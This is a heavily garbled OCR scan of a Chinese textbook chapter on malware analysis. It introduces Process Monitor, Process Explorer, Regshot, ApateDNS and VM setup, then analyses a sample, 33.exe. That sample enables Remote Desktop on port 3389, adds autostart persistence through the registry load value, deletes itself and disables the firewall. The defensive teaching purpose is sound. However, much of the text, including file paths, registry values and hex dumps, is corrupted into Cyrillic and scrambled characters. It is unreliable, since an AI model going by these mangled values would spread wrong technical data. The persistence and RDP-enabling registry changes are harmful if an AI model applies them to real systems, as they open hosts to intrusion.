由 ХЕВЯЕТ 32. DLL 1 10:0001) О 100000) | деф: та «КеуБо ак dLayout 0х00018673 
: - М FLL DLL 2 Юх0002) 1 10:0001) | AdjastYiraonwEKect 0500021 140 
=.-Я HETAPI32 DIL 3 100003) | 2 0х0002) | AdlastYyindonwRectEx Ох0001ЕТЕА 
: ; ADVAEI32. DLL 4 1050004) 3 100003) Мі:Егсіз 0х000504Е0 
KERNEL32. DLL 5 0200063 4 10-0004) | А11 о Е оке ргоппЯ Ас 3 уа# тот 0=00045414 
WSVCET ILL в 0:0006) 5 10:0005) | AllonSetForegroundt indor 0200011:40 
#1011 DIL T 100007) | 6 1020006) | AninsteWindor 0500012155 
СОД мсма ILL 8 100008) | Т 10:0007) | Агу?срар 0:00053С27 
: -Z SECUB32 DLL 2 9 0000823 8 10:0008) | кррегдйеплА 0z00021 ROE 
0 0хСО0А) Я 10х0000) | Аррсг«Йегай 0х000132БА 
г 


МИ иван лымды » Па гапъл 1 I< ГОПАЛ | вым уус Taani AW; n Асма = пупппабта?. 


[Тез Te Te Sas ГЕ ии Теле ес Тане Link балы Пей беден ТОР Трава ТЗ Preferred Base 
NSTAVA. DLL Error opening Eile. 22 = 
MPR. DLL 2008-04-14 20:00 2008-04-14 7 13 =: 904 
сшзг ILL 2008-04-14 20:00 2208-04-14 10:12 255, 194 
KERMEL32 DLL | 2008-04-14 20:00 | 2208-04-14 10:13 1,150, 464 
JTDLL ILL 2008-04-14 20:00 2008-04-14 10:13 539, 312 
VSEE32. DLL 2008-04-14 20:00 2008-04-14 10:13 574, 975 
Я МА EXE | 2015-04-29 22:23 |2015-04-29 22:23 28, 672 
ACTIVEIS DLL 2008-04-14 20:00 2108-04-14 10:12 192, 000 
ADSLDPC. DLL | 2008-04-14 20:00 2708-04-14 10:12 145, 380 


89-18 Dependency Walker 界 面 


ЕЕ 


0200015896! 000016861 х5 Console си 0х7 1A000290 
030004960 0х0004950Е 255 Console Cv Ох? TEFOOIO 
0х00122828 0х0й0122А2В 285 Console сү 0х1С820020 
П«00087СВ7 00008 7СВТ х95 Console су 0576920000 
0х00080421 0х00081421 165 GUL сү 0xTTD10020 
Dx00000000 0х00015008 285 GUT 0570400000 
ПуПППЗТЕЗЬ 00037836 = Console cy 0577290070 
0х000291А3 0х000201 43 02 Console сү 0х761Е0090 


> = р = > = >= >= > 
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接 下 来 将 介绍 两 种 强大 的 进程 监控 软件 一 Process Monitor 和 Process Explorer。 


З. Process Monitor, ВЕ 15328 ( 简称 procmon ) 


procmon 的 主 界 面 如 图 9-19 所 示 ， 图 上 详细 列举 了 每 一 个 程序 所 使 用 的 函数 、 路 径 等 


详细 信息 。 


ёш Process Nonitor 一 Sysinternals: 


Edit Event Filter Tools 


Üptions Help 


www. sysinternals. com 


9; 
9: 
9: 
9: 
9: 
9: 
9: 
EF 
9: 
9: 
9: 
9: 
9: 
9: 
9: 
9: 
|| 
9: 
9: 
9: 
9: 
9: 
9: 
9: 
9: 
9: 
9: 
9: 
%: 
ЕН 
3: 
КЕ 
2! 
2: 
27 
9: 
ЕД 
J: 
9: 
rk 
9: 
9: 
9: 
9: 
9: 
9: 
9: 
9: 
3: 


& | ç À @ | 


Process Hame 


ЖУ Procmon. 
EY Procmon. 
ЖҮ Frocmon. 
2] Procmon. 
ЖУ Frocmon. 
ЖУ Frocmon. 
ЖУ Procmon. 
ЖУ Frocmon. 
еше 
еше 
ехе 
ехе 
ехе 
ехе 
ехе 
ехе 
ехе 
ехе 
ехе 
ехе 
ехе 
ехе 
ехе 
ехе 
ЖУ Procmon. 
27 Procmon. 
ЖУ Procmon. 
ШУ Procmon. 
27 Procmon. 
27 Procmon. 
ЖУ Procmon. 
ЖУ Procmon. 
ЖУ Procmon. 
ЖУ Procmon. 
ЖУ Procmon. 
ЖУ Procmon. 
2? Procmon. 
ЖУ Procmon. 
ЖУ Procmon. 
ЖУ Procmon. 


Г sass. 
ГІ 15а55. 
Г 1за55. 
Г 1 sass. 
Г 1 sass. 
Г 1 sass. 
F 1за55. 
Г 1за55. 
ГІ 1sass. 
ГІ l sass. 
Г 1 sass. 
Г 1 sass. 
Г 1 sass. 
Г” 1 sass. 
Г 1 sass. 
Г 1 sass. 


Г System 


ЖУ Procmon. 
ЖУ Procmon. 
ЖУ Procmon. 
ЖУ Procmon. 
ЖҮ Procmon. 
ЖУ Procmon. 
ЖУ Procmon. 
; . еке 


есе 
есе 
есе 
есе 
есе 
есе 
есе 
есе 


ехе 
ехе 
ехе 
ехе 
есе 
ехе 
ехе 
ехе 
есе 
ехе 
есе 
есе 
ехе 
ехе 
ехе 
ехе 


есе 
есе 
есе 
есе 
ехе 
есе 
есе 


= | 


FID Operation 


3236 ЖА РАЅТІО НЕТН... 
3236 Е ЕАЗТТО НЕТА... 
3236 Е ОТКР ИТ СКЕАТЕ 


3236 区 ЕАЗТТО НЕТ"... 
3236 СА ЕАЗТТО НЕТЯ.. 
3236 EK ЕАЗТТО НЕТТ... 
3236 ER ТЕР_И] СКЕАТЕ 
708 Ж КегОрепКеу 
708 ЁЙ Кегбрепкет 


ав мат 


С: АТ НОВА у 5 ет? 4Беһеір. 411 
С: NWINHDOWSVsystem32Vdbghelp. 411 
С: ВТ НОВО 57 54ет32\ БЕВе]1р. 411 
3236 EK БАЗТТО НЕТ®...С: 
С 
С 
С 
С 


Path 


VNIHDOWSNsystem32VWSCTFIXE. 


: \RINDORS\ system32ż\MSCTFIME. 
: NVWINHDOWSNsrstem32"MSCTFIME. 
: \ 9140075 5754 ет32\ ИЗСТЕГИЕ. 
: \ 9140095 5754 ет32\ ИЗСТЕТИЕ. 
НКГИ\ ЗЕСЛАТТУ\Ро11су 

НКГИ\ ЗЕСЛЛАТТУ Ро! ісу ,ЗесПезс 


ТИЕ 
ТИЕ 
ТИЕ 
ТИЕ 
ТИЕ 


708 № FRegQueryValue НКГИ\ ЗЕСЛЕТТУ\Ро1 су 5есПезс\ (.. 


708 ЁЙ RegCloseKey 
708 В КесОрепКеу 


108 ЁЙ КенСісзеКеу 
708 Й КеЕС1озеКеу 
708 Ж КесОрепКеу 
708 Ж КегОрепКеу 
708 ЁЙ RegQueryValue 
708 ЁЙ RegCloseKey 
т08 ЁЙ КесОгепКеу 


708 ЁЙ КекСісзеКеу 
т08 ЁЙ кеЕС1озеКеу 
3236 EK ЕАЗТТО НЕТН... 
3236 2% ТЕР М) СКЕАТЕ 
3236 EK FASTIO_ACQU... 


3236 EK FASTIO_RELE.. 
3236 EK FASTIO_ACQU.. 
3236 EK FASTIO RELE.. 


3236 EA ІЕР М) CLOSE 

3236 EK РАЅТІО НЕТА... 
3236 Е ТЕР М) СКЕАТЕ 
3236 EK FASTIO_ACQU... 


3236 ФА FASTIO_RELE... 

3236 EK FASTIO_ACQU... 

3236 ЕҚ FASTIO_RELE... 
4 ВАТЕР М) ОМЕК.. 


3236 EK IRP ИЈ CLOSE 
3236 EK ЕАЗТТО НЕТА... 
3236 Е IRP_MJ_CREATE 


3236 EK FASTIO_QUER.. 
3236 ЗА FASTIO_ RELE. . 
3235 СА ЕАЗТТО ACQU.. 


С: 
С: 
C:NNÑIHDONSVsystem32N1sass. 
3236 EK FASTIO_QUER...C: 
С: NÑIHDONSNsystem32N1sass. 
С: NWIHDONSNsystem32N1sass. 
.C:VÑIHDONSNsystem32N1sass. 
3236 EK ТЕР М) СПЕАКИРС: 
С: ВІНОК 5754 ет324,1 sass. 
С: VWINHDOWSNsystem32N1sass. 
С: \ 914009 $ \ 5754 ет3 241 5а553. 
С: \9ГНОЯ $ \ 5754 ет32\1 5255. 
3236 ФҚ FASTIO_QUER...C: 
С: ВІНОК Ч 5754 ет32\15а 55. 
С: VWINDOWQSNsystem32N1sass. 
С: АТ НООВО4 57 $4 ем32\15а55. 
„С: VÑINDORSNsystem32N1sass. 
3236 Е ТКР Ж) СЪЕАНИРС: 
С: ВІНОК 5754ет32\15а5$5. 
С: ВІНОК Ч 5754ет32\15а5$5. 
С: АНТНООНО 4 5754ет32\15а5$. 
3236 EK FASTIO_ACQU...C: 
С: VWINDOWQSNsystem32N1sass. 
HS они на 
жы, 


НК И ЗЕСЛЛАТТУ Ро! 1 су ,ЗесПезс 
HKLM SECURITY 4Ро|1 ст ,ЗесПезс 
708 № RegQueryValue НКГИ\ ЗЕСЛЕТТУ\Ро1 і су \ $есПезс\ (. 
НКГИ\ SECURITY \Folicy\SecDesc 
НК И SECURITY Ро! 1 су 

НК И SECURITY Ро! 1 су 

НКГИ\ ЗЕСЛАТТУ Ро! 1 су „ЗесПезс 
НКГИ\ SECURITY Рой су\бесПезс\ l.. 
НКЪ И SECURITY Ро! 1 ст ,ЗесПезс 
НКЪ И SECURITY Ро! 1 ст ,ЗесПезс 
708 Ж FegQueryValue НЕГИЗЕСИКТТУ Ро! 1 су убесПезс 4 (... 
HKLM SECURITY Policy SecDesc 
HKLM'SECURITYNPolicyr 


ЧАТНООНВ 5754 ет32\15а55. 
ВІНО 57541ет32\15а55. 


ехе 
ехе 
есе 
есе 
exe 
exe 
exe 
eze 
exe 
ехе 
ехе 
ехе 
ехе 
ехе 
ехе 
ехе 
ехе 
ехе 
ехе 
ехе 
ехе 
ехе 
есе 
есе 
ехе 


ЧЪТНООН Ч 5754 ет32 41 sass. 


ЧАТ НО \ 5754 ет324,15а55. 


\ 1007$ Бузі ет32\ 15255. 


ЧАТ НОВА 5754 ет32\ 15255. 


\ #140075 \ 5754 ет32415а55. 


9-19 ”procmon 主 界面 


Fesult 


SUCCESS 
SUCCESS 


SHARING VIOLA... 


SUCCESS 
SUCCESS 
SUCCESS 
SUCCESS 


SHARING VIOLA... 


SUCCESS 
SUCCESS 


. BUFFER OVERFLOR 


SUCCESS 
SUCCESS 


.. SUCCESS 


SUCCESS 
SUCCESS 
SUCCESS 
SUCCESS 


. BUFFER OVERFLOW 


SUCCESS 
SUCCESS 
SUCCESS 
SUCCESS 
SUCCESS 
SUCCESS 
SUCCESS 
SUCCESS 
SUCCESS 
SUCCESS 
SUCCESS 
SUCCESS 
SUCCESS 
SUCCESS 
SUCCESS 
SUCCESS 
SUCCESS 
SUCCESS 
SUCCESS 
SUCCESS 
SUCCESS 
SUCCESS 
SUCCESS 
SUCCESS 
SUCCESS 
SUCCESS 
SUCCESS 
SUCCESS 
SUCCESS 
SUCCESS 


Detail 


CreationTime:... 
CreationTime:... 
Desired Acces... 
CreationTime:.. 
CreationTime:... 
CreationTime:... 


CreationTime:. 


Desired Acces... 
Desired Acces... 
Desired Acces... 


Length: 12 


Desired Acces... 
КЕС МОН... 


Туре: 


Desired Acces... 
Desired Acces... 


Length: 12 


Desired Acces... 
КЕС МОН... 


Туге: 


CreationTime:. 


Desired Acces... 
бута... 
QuerySt... 


5угсТуре: 
Туре: 


5угсТуге: 


Стеа? 10111те:... 
Desired Acces... 
ӨТІП 25 
QuerySt... 


5угсТуге: 
Туре: 


5угсТтге: 


Туре: 


CreationTime:... 
Desired Acces... 
Syn... 
рчетт 84... 


5угсТтге: 
Туре: 


671... 


571... 


рчетт На... 


选中 其 中 的 一 个 程序 双击 ， 打 开 Event Properties 对 话 框 ， 可 以 看 到 这 个 程序 所 加 载 的 
DLL 库 连 接 、 创 建 与 运行 时 间 ， 如 图 9-20 所 示 。 在 Process 选 项 卡 中 可 以 看 到 程序 所 在 的 安 
装 地 址 以 及 最 下 方 整个 程序 所 加 载 的 DLL 库 及 其 位 置 ， 如 图 9-21 所 示 。 而 最 后 一 个 Stack 选 
项 卡 ， 描 述 了 程序 以 及 加 载 的 DLL 库 函数 在 内 存 中 的 位 置 。 
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жон 病毒 不 神秘 人 MM 


Event Properties 


Еуегі | Process | Stack 


Image 
Event Properties Process Monitor 


Event |Process | Stack Sysinternals - waw, sysinternals.com 


Name: Procmon.exe 
Date: 2015-4-30 9:39:20 


Thread: 3972 
Class: Flle Systern Path: 

Operation: ҒА5ТІО МЕТЖОВК ОМЕВҮ ОРЕМ C:\Documents and 5ettings\admin\ 桌 面 \ 恶 意 病 毒 分 析 \ProcessMonitor(1)\Procemon,ex| 
Result: SUCCESS 

Path: C;lWwlNDOwWS1system3zidbghelp.dll 
Duration: 0.0000001 


Version: 3.11 


Command Line: p ДЕ емее в ай : 
"C:\Documents and Settingsladmin! 点 面 亚 意 病毒 分 析 \ProcessMonikor(1)Procmon.e| 


CreationTime: 2008-4-14 20:00:00 PID: 3236 Architecture: 32-bit 


LastAccessTirme: 2015-4-30 9:39:20 
LastwriteTime: 2008-4-14 20:00:00 Parent PID: 1900 Virtualized: nja 


ChangeTime: 2014-10-14 20:16:17 : 7 я 
AllocationSize: 643,072 Session ID: 0 Integrity: | гуа 


EndOfFile: 640,000 User: ASD-297B0F069901ədmin 
FlleAttributes: A 
Auth ID: 00000000:00026Ғаб 
Started: 2015-4-30 9:39:19 (Running) 
Modules: 


Module Address Path ^ 
Ргостоп,ехе 0х400000 C:\Documents and Sett = 
ZYW INE OWSIsystem3 
ухфете, dil C:WINDOWSLsysterm3 
МЕТАРТЗ2. 4! C:WINDOWSLUsystem3 | 
< T В 


+ | * овес нд eornm | +|+[ Dewa [=a | зе”) 
9-20 “Event 选 项 图 9-21 “Process 选 项 
该 程序 最 有 用 的 则 是 Process Monitor Filter 功 能 ， 如 图 9-22 所 示 。 


ШЕ Process Wonitor Filter 


Rernove 


ІШ 


Display entries matching these conditions: 
м 
ТВР МЈ 5ЕТ УОЮШМЕ ТМЕОВМА A 
IRP_MJ_SHUTDOWN я 
ІРР МЈ 5Ү5ТЕМ CONTROL 
ТЕР МЈ YOLUME _DISMOLINT 
дори р IRP_M]_YOLUME_MOUNT 
r IRP_MJ_WRITE 
Q Event ... is IRP_MN_QUERY_INFORMATION 
Load Ітаде 
Process Create 
Process Exit 
Process Profiling 
Process Start 
Process Statistics 
RegCloseKey 
КедСгеаеКеу 
RegDeletekey 
RegDeletevalue 
КедЕпитКеу 
RegEnurnvalue 
RegFlushKey 
RegLoadKey 
КедОрепКеу 
КедОцегуКеу 


RegĝueryY alue 
RegRenameKey 

RegSetInfoKey 

RegSetkeySecurity 

RegSetvalue М, 


图 9-22 ҒійегіЕ 
读者 可 以 在 Filter 中 选择 想 监控 的 函数 ， 这 样 可 以 使 繁杂 的 界面 变 得 简单 ， 同 时 也 可 
以 有 针对 性 地 对 病毒 的 某 种 功能 进行 详细 监控 。 
其 实 看 程序 最 方便 的 还 是 看 进程 树 ， 虽 然 这 款 软 件 中 也 有 Process Tree (Tools 选 项 下 
第 2 个 ) 功能 ， 但 是 却 无 法 与 接 下 来 将 要 介绍 的 软件 相 比 。 
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4. Process Ехрогег 


Process Explorer 可 以 使 进程 、PID、CPU 占 用 率 等 一 目 了 然 ， 其 中 标记 监 色 的 进程 为 
用 户 进程 ， 红 色 为 系统 进程 ， 绿 色 为 新 运行 的 进程 ， 如 图 9-23 所 示 。 为 了 碍 看 系统 文件 是 


же 
ж System Idle Process 
Ші 75) System 
224 Interrupts 
B ГІзт55. ехе 
С5Ү55. ехе 
а В winlogon. ехе 
日 Гтізегтісез. ехе 
Ymacthly. ехе 
svchost. exe 
Ггізусһоз%. ехе 
B [и] зусвози. ехе 


\луалїс1+. eze 


wscntfy, eze 


ГТ|зусһоз1. exe 

[151056 ехе 
зроо| <у. ехе 

G vmtoolsd. eze 
alg. ехе 


= gi TPAutoConnsve. Да 
о TPAutoConn. Да 


Гоа. ехе 
15455. ехе 
日 3 explorer. exe 
ТГ vmtoolsd. eze 
М АйоһеАВИ exe 
Ë сі fmon. eze 
notepad. ее 
notepad. exe 
notepad. eze 
RinRAR. ехе 
5 SogouCloud. eze 
Оу рхосехр. еше 
Е: соп те. ехе 


> 


п/а Hardware Interrupts а... 
580 Windows НТ Session Ma... 
628 Client Server Runtime... 
652 Windows NT Logon Арр1... 
696 Services and Controll... 
880 VMware Activation Helper 
896 Generic Host Process ... 
964 Generic Host Process . 
1060 Generic Host Process ... 
2016 Automatic Updates 
1408 Qindows Security Cent... 
1148 Generic Host Process ... 
1260 Generic Host Process ... 
1432 Spooler SubSystem Арр 
1676 УИмате Tools Core Ser.. 
192 Application Layer Gat... 
392 ThinPrint AutoConnect... 
1000 ThinPrint AutoConnect... 
1724 Image Mastering АРІ 
708 154 Shell (Ezport Ver... 
1988 Windows Ezplorer 
1024 WWware Tools Core Ser... 
1084 idobe Reader and Acro... 
1096 CTF Loader 
3432 记事 本 
3956 记事 本 
512 记事 本 
1352 WinRAR archiver 
2908 ЮЛЕ сіне 


1704 Sysinternals Process ... 


208 

2, 636 
8, 204 
1, 816 
712 

2, 956 
1, 924 
18, 212 
5, 772 
664 
1,416 
1, 796 
4, 796 
3, 368 
1, 240 
1,468 
4, 284 
2, 372 
3, 844 
35, 716 
11, 424 
4, 252 
984 

1, 564 
1, 564 
1, 564 
4,640 
2, 344 
26, 316 


6, 912 
5, 384 
3,504 
2,608 
5, 444 
4,452 
27,600 
5,480 
2,464 
3, 720 
4, 552 
1,148 
12, 376 
3, 704 
4,464 
7, 916 
4, 132 
1, 224 
12, 716 
16,660 
8, 216 
3, 768 
820 
828 
748 
712 

7, 056 
17, 872 


- ЖЕ. > Б. С > > >q > >q > q >t >q > > q > q > М. > q ім о = = 
пея > = > > > > >t та > >q >q >t оят ы 


Ш 


CPV 使 用 率 : 1.81% ЖЕТЕУ: 14. 15% | 进程 数 : 34 内 存 使 用 率 : 37.21% 


о. Regshot 


Regshot 是 一 于 注册 表 快 照 软件 。 单 击 “ 快 照 CA) ”按钮 运行 目标 文件 ， 单 击 “ 快 照 
(В) ”后 就 会 出 现 检测 注册 表 是 否 修 改 ， 以 及 伴随 大 注册 表 修 改 而 产生 的 文件 报告 ， 如 


图 9-24 所 示 。 


图 9-23 ”procexp 进 程 树 


G: Regshot 2.0.1.66 unicode 
文件 快照 快照 @B) 报告 мы 


Г] ЕНЕНЕ 
报告 保存 文件 来 ; 


[C:\Documents апа Settings\admin 810 | т | 


ВЕС: 


| Report 


全 部 清除 
添加 注释 到 报 肖 ; 


| 
| 


— Ии — 


Microsoft Corporation 
Microsoft Corporation 
Microsoft Corporation 
Microsoft Corporation 
VMum re, Inc. 

Microsoft Corporation 


. Microsoft Corporation 


Microsoft Corporation 
Microsoft Corporation 
Microsoft Corporation 
Microsoft Corporation 
Microsoft Corporation 
Microsoft Corporation 


. УИмате, Inc. 


Microsoft Corporation 
Cortado Аб 

Cortado Аб 

Microsoft Corporation 
Microsoft Corporation 
Microsoft Corporation 
VAware, Inc. 

Adobe Systems Incor... 
Microsoft Corporation 
Microsoft Corporation 
Microsoft Corporation 
Microsoft Corporation 
ålezander Roshal 
Sogou, com Inc. 
Sysinternals - www... 
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9.2.4 ”虚拟 环境 搭建 


使 用 虚拟 机 搭建 虚拟 环境 在 分 析 病 毒 时 是 


不 可 或 缺 的， 模拟 出 一 个 真实 的 系统 并 且 构 造 |2460 жар лай ите кто т 


出 一 个 虚拟 的 网 络 来 隔绝 病毒 在 互联 网 传播 。 | 
VMware Workstation 软 件 如 图 9-25 所 示 。 9-25 Vmware Workstation 软 件 


VMware Workstation 的 安装 过 程 以 及 基本 使 用 方式 与 VBox 类 似 ， 不 再 更 述 ， 这 里 主要 
介绍 一 下 虚拟 网 络 的 搭建 过 程 。 
ApateDNS 软 件 界面 如 图 9-26 所 示 。 


ГР ApateDNS Ге Ге |: | 


Capture Window 


Domain Requested DNS Returned 


DNS Reply ТР (Default: Current Са нау/ DNS): .127.0.0.1 
# of NXDONAIN s: 0 


Selected Interface: УМкаге Virtual Ethernet Adapter for Wnet? + 


9-26 ApateDNS 主 界面 
打开 ApateDNS， 在 主 界面 的 CaptureWindow 选 项 卡 下 会 显示 访问 Internet 的 网 络 活动 ， 
在 下 方 的 DNS Веру IP 处 填写 将 要 访问 的 虚拟 IP 地 址 ， 在 Selected Interface 处 选择 虚拟 机 当 
前 使 用 的 网 络 ， 单 击 Start Server 按 钮 ， 结 果 如 图 9-27 所 示 。 
|" ApateDNS Ee |657 


Domain Requested DNS Returned 

g. local domain FOUND 

auto. search. msn. сот FOUND 
FOUND 
FOUND 
FOUND 


FOUND 


[+] Server started at 21:16:27 successfully. 


DNS Reply IP (Default: Current Gatway/DNS): Start 
— Server 


# of НХПОМАТЕ s: 0 


图 9-27 ”运行 后 结果 
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随后 在 虚拟 机 中 打开 任意 一 个 网 站 ， 地 址 解析 将 会 跳 转 到 输入 的 虚拟 IP 地 址 ， 同 时 
ApateDNS 下 也 会 显示 将 要 访问 的 网 站 。 如 果 想 要 详细 地 了 解 病 毒 的 网 络 动 态 ， 请 使 用 
Wireshark 进 行 抓 包 。 

当然 ， 有 些 病毒 具有 有 反 虚 拟 机 技术 ， 即 在 虚拟 机 环境 下 病毒 不 会 运行 ， 这 时 便 需 要 使 
用 沙 箱 / 沙 盒 〈 见 图 9-28) 代替 虚拟 机 环境 。 


Не Мем Sandbox Configure Help 
Program Name | PID Window Title 


(> Sandbox DefaultBox 


9-28 沙 箱 
将 程序 拖 入 沙 箱 ， 就 可 以 在 一 个 安全 环境 下 运行 了 。 
接 下 来 将 用 以 上 提 到 的 工具 对 病毒 进行 行为 上 的 分 析 以 及 代码 上 的 揭秘 。 


9.2.5 ”病毒 实例 分 析 


请 务必 于 虚拟 机 或 者 沙 箱 内 运行 。 
33.exe《〈 见 图 9-29) 是 一 个 典型 的 PE 文件 ， 先 使 用 杀毒 软件 对 其 进行 手动 查 杀 。 


图 9-29 33.exe 
(1) 先 对 虚拟 机 进行 一 次 快照 ， 作 为 系统 还 原 备份 ， 并 且 记录 当前 运行 环境 信息 作 
为 备注 ， 如 图 9-30 所 示 。 
病毒 测试 专用 设备 - НАЯ "=; 
ç ЕТО АВА ЛАКЕ, П Б ЕКЕН 


名 称 (N): 快照 1 
E(D): 运行 33.exe 之 前 


9-30 ”拍摄 还 原点 
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(2) 搭建 虚拟 网 络 ， 阻 止 病毒 与 网 络 的 接触 ， 将 网 络 配置 选择 为 虚拟 机 当前 网 络 ， 
如 图 9-31 所 示 。 
Selected Interface: 
图 9-31 设置 虚拟 网 络 
有 了 以 上 两 点 准备 以 后 ， 就 可 以 先 尝 试 从 行为 上 对 其 进行 分 析 。 
(3) 打开 Regshot 软 件 ， 对 其 进行 两 次 快照 ， 快 照 时 应 选择 全 部 注册 表 并 且 备 注 信 
дА, шЕо- 32 я. 


&: Regshot 2.0.1.66 unicode 
хе ВФ Во Жа 帮助 


[Г] 连接 到 远程 注册 表 
报告 保存 文件 夹 ; 
C:\Documents апа Settingstadmin s [HJ = 
报告 名 称 ; 
全 部 请 除 


添加 注释 到 报 肖 ; 


图 9-32 注册 表 快 照 
快照 (A) 完毕 后 运行 33.exe 程 序 ， 同 时 使 用 Process Explorer 进 行进 程 监控 。 随 后 运行 
33.exe， 然 后 进行 快照 〈(B) ， 快 照 完毕 后 会 弹出 一 个 分 析 报 告 网 页 ， 从 中 可 以 看 出 注册 
表 项 的 变化 〈 见 图 9-33 一 图 9-36) 。 
3 快照 比较 报告 Regshot 2.0.1.66 unicode - Microsoft Internet Explorer 
РЕ) жіне) SEV KEW ТАФ $ 


O=- O- Ш ИФ ри дих © @- > = 3 
НЫЕ Ф) (E) C:\Documents and Settings\Admini Ya Es OO 
CHR (о) 快照 A 


新 添加 键 (7) ВЕН в 


[HKEY_LOCAL_MACHINE\ SOFTUARE\ Microsofti Windowsi CurrentVersion\netcache] 
[HREY LOCAL МАСНІМЕ\ ЗУЗТЕН,Сопсго15ет0014 Controli Terminal Serveri ВрРТср] 
[НКЕҮ LOCAL MACHINE, SYSTEMYControl3Set001Servicesy RDPUDA Еп] 
[HKEY_LOCAL_MACHINE\ SYSTEM; ControlSet00 1\ Services ТрТСР\ Enum] 

[НКЕҮ LOCAL МАСНТМЕ\ SYSTEM CurrentControlSet\ Controli Terminal Зегуег\ RDPTep] 
[НКЕҮ LOCAL МАСНІМЕ\ SYSTEM CurrentControlSet\ Services RDPWDA Enum] 
[HKEY_LOCAL_MACHINE\ SYSTEM CurrentControlSet\ Services ТрТСР\ Enum] 


9-33 注册 表 变 化 (1) 
从 图 9-33 中 ， 可 以 看 出 新 添加 的 注册 表 键 值 ， 其 中 的 RDPTcp 和 TDTCP 均 为 启动 
“3389”， 也 就 是 远程 昌 面 控制 的 注册 键 值 PortNumber 的 值 修 改 为 3389。 
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СМЕНЕН (1) 快照 A 
[HKEY 1ОСАІ МАСНІМЕ\ SOFTWARE; Microsoft УУВЕМ\ WDM ] 
"С: \ WINDOWS\" зузтсен32\ \ DRIVERS) \ ipnat.sys[IPNATMofResource] "="LowDateTir 


新 添加 值 (15) HE в 

[HKEY_LOCAL_MACHINE" SOFTWARE" Microsofti Windows"CurrentYersion\ netcache] 
"Enabled"="O" 

[HKEY_LOCAL_NMACHINENSYSTENINControlSet001` Control Terminal бегуег\ КОРТср] 
"РогсНишрег "=азога: 0О000ОЯЗА 

|НКЕУ 1 ОСАІ_МАСНІМЕ\ ҮСТЕМ ControlSet00 1), Services\ RDPWD\ Enum] 
"o"="Root) \ LEGACY_RDPUWD\ \ 0000" 

"Count "=dword:00000001 

"Next Instance"=dword:00000001 

[НКЕҮ 1 ОСА _МАСНМЕ\ SYSTEM ControlSet001" Services, ТОТСР\ Enum] 
"0"="Воос\ \ БЕСАСУ ТРТСР\\ 0000" 

"Count "=dword:00000001 

"МехсТизтапсе"=ачцока: 00000001 

[HKEY ГОСАГ МАСНТМЕХЗУЗТЕМА CurrentControlSet\ Control, Terminal 5егуег\ ВОРТср] 
"РогеМикрек"т-ауога:оооооаза 

ІНКЕУ 10САІ МАСНІМЕ\ SYSTEM CurrentControlSet" Services КОР\ОХЕпит | 
"0"="Коос\ \ БЕСАСУ ВОРУР\\ 0000" 

"Count "+ дчога:00000001 


图 9-34 注册 表 变 化 (2) 


已 改变 值 (13) 快照 A 

[HKEY_LOCAL_MIACHINE\SOFTWARE\Miicrosoft\Cryptography\RNG] 

"Зеей"-һех:95,60,д44,ее,2а,е8,с4,59,58,06,4а,4Ғ,34,77,81,е2,51,е6,02,04,44,83,% 
26,84,46,ра,р1,59,64,сҒ,0с,79,5с,05,0р,с5,43,51,5%,0с,53,50,69,58,(с,а1,са,% 
05,34,5(4,41,05,Ғ7,1с,07,50,74,36,а6,46,28,2р,54,е7,59,с1,ес,с4,13,ер,9с,32,% 
Та,аа,га,ре,73,ее,3За,1Г0 


"Зеей"-һех:0Ғ,53,11,242,18,рр,9Ұ,с5,се,6р,03,28,5,43,61,62,40,е6,4р,е4,75,24,% 
2а,34,ас,49,13,а9,30,а4с,50,1с,88,50,47,с0,2а,19,41,ес,ес,24,38,43,66,57,сЬ,% 
08,0е,05,34,4а,59,54,Брс,09,09,01,3с,с5,8е,44,ае,а3,44,6с,са,Ғ2,59,0е,95,78,% 
Оа, f3, 44,79, 16, е8, а5,е9 


ІНКЕУ ІОСАІ МАСНІМЕ\ SOFTWARE\ Microsofti Windows NT\CurrentYersion\pProfileList\5-1-5-19] 
"ВеЁСоцис"=ацога: 00000002 

"ВеЁёСоцис"=ачога; 00000001 
[HKEY_LOCAL_MACHINE" SYSTEM) Сопігоібеї001\ Control, Terminal Server] 
"fDenyTSConnections"=dword:00000001 
rfDenyTSConnections"=dword:00000000 

[HKEY ГОСАС МАСНІМЕ,, 5Ү5ТЕМ, ControlSet001\ Services\ SharedAccess* Epoch] 
"Epoch"=dword:00000018 

"Epoch"=dword:00000019 

[HKEY ГОСАС МАСНТМЕХЗУЗТЕМА ControlSet001\ Services TermDD ] 
"Start"=duord:00000001 

"Бсасс"-амога:00000002 


[НКЕУ_1ОСАЕ_МАСНИМЕ\ SYSTEM) ControlSet001\, Services\ Тегіпбегмісе | 
"бсасс"-амога:00000003 
"Зтагс"=ацога: 00000002 


89-35 Е (3) 


[HKEY_USERSN.DEFAULT' Keyboard Layout Toggle ] 

"Носкеу"-"1" 

"Носкеу"< "2" 

[НКЕУ_05ЕВ5\,5-1-5-18\Кеубоаг4 Layout Toggle 1 

"Носкеу"="1" 

"Ноткеу"="2" 

[HKEY _CURRENT_USER\ Software Microsoft\ Windows NT\ СиггепЕмегѕіоп\ Windows] 
"Тоай"<"" 


"Тоай"< "С: АА WINDOVUSYY зузсетз2\\33.ехе" 


9-36 ”注册 表 变 化 (4) 
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从 图 9-36 中 ， 也 就 是 HKEY CURRENT USER\Software\Microsoft\Windows КТ) 
CurrentVersion\Windows\load, Load ="С: \WINDOWS\\system32\\33.exe"， 可 以 看 出 33.exe 
将 其 自身 复制 进 系统 目录 ， 并 且 修 改 load 键 值 ， 实 现 程 序 随 注 册 表 自 启 动 。 

运行 完 以 后 ，33.exe 从 果 面 上 “消失 ”， 工 具 procexp 捕 捉 到 cmd.exe 短 暂 的 运行 ( 见 
99-37) 过 程 ， 目 此 可 以 推 新 其 利用 CMD 命 令 进行 目 我 删除 。 


ЗА согапе. ехе Уаз к 3, U3b К 1100 Console ІАЕ 
o gna. eze 0.72 1, 556 K 1,616 К 1796 Ñindows Commar 


CPU 使 用 率 : 14.13% TEU. 11.93% ЖЕЖ: 31 内存 使 用 率 : 27.04% 


图 9-37 ”工具 procexp 捕 捉 
从 采 面 右 下 角 出 现 防 火 墙 关 闭 气泡 提示 ， 很 明显 地 看 出 该 病毒 也 关闭 了 系统 防火 墙 ， 


如 图 9-38 所 示 。 


备注 : Windows ААТА ВОВУ KS, 


фун 检查 设置 | 人 
此 十 算 机 尚未 配置 Вази. ще ид Бад, 让 Windows 自动 用 重要 更 新 保持 
РВА ОЕТ). Би Л? 

局 用 目 动 更 新 | 4 
7 病毒 防护 找 不 到 а 


Windows 在 计算 机 上 找 不 到 防 病毒 软件 。 e e НСИ АЯ 
аа а IË Др : иа теп 以 执行 的 操作 。 


